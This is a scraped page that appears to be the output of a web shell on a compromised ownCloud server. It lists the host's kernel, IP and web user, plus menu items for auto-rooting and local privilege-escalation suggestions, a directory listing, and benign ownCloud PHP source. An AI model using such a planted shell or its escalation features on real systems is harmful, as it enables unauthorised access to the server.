Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
owncloud-prm /
settings /
Panels /
Admin /
Delete
Unzip
Name
Size
Permission
Date
Action
Apps.php
1.25
KB
-rw-r--r--
2018-04-19 18:15
BackgroundJobs.php
1.45
KB
-rw-r--r--
2018-04-19 18:15
Certificates.php
1.89
KB
-rw-r--r--
2018-04-19 18:15
Encryption.php
1.95
KB
-rw-r--r--
2018-04-19 18:15
FileSharing.php
4.87
KB
-rw-r--r--
2018-04-19 18:15
Legacy.php
1.36
KB
-rw-r--r--
2018-04-19 18:15
Logging.php
2.04
KB
-rw-r--r--
2018-04-19 18:15
Mail.php
2.51
KB
-rw-r--r--
2018-04-19 18:15
SecurityWarning.php
4.63
KB
-rw-r--r--
2018-04-19 18:15
Status.php
1.15
KB
-rw-r--r--
2018-04-19 18:15
Tips.php
1.15
KB
-rw-r--r--
2018-04-19 18:15
Save
Rename
<?php /** * @author Tom Needham <tom@owncloud.com> * * @copyright Copyright (c) 2018, ownCloud GmbH * @license AGPL-3.0 * * This code is free software: you can redistribute it and/or modify * it under the terms of the GNU Affero General Public License, version 3, * as published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Affero General Public License for more details. * * You should have received a copy of the GNU Affero General Public License, version 3, * along with this program. If not, see <http://www.gnu.org/licenses/> * */ namespace OC\Settings\Panels\Admin; use OCP\Settings\ISettings; use OCP\Template; class Encryption implements ISettings { public function getPriority() { return 30; } public function getPanel() { $tmpl = new Template('settings', 'panels/admin/encryption'); $tmpl->assign('encryptionEnabled', \OC::$server->getEncryptionManager()->isEnabled()); $tmpl->assign('encryptionReady', \OC::$server->getEncryptionManager()->isReady()); $encryptionModules = \OC::$server->getEncryptionManager()->getEncryptionModules(); $defaultEncryptionModuleId = \OC::$server->getEncryptionManager()->getDefaultEncryptionModuleId(); $encModules = []; foreach ($encryptionModules as $module) { $encModules[$module['id']]['displayName'] = $module['displayName']; $encModules[$module['id']]['default'] = false; if ($module['id'] === $defaultEncryptionModuleId) { $encModules[$module['id']]['default'] = true; } } $backends = \OC::$server->getUserManager()->getBackends(); $externalBackends = (count($backends) > 1) ? true : false; $tmpl->assign('externalBackendsEnabled', $externalBackends); $tmpl->assign('encryptionModules', $encModules); return $tmpl; } public function getSectionID() { return 'encryption'; } }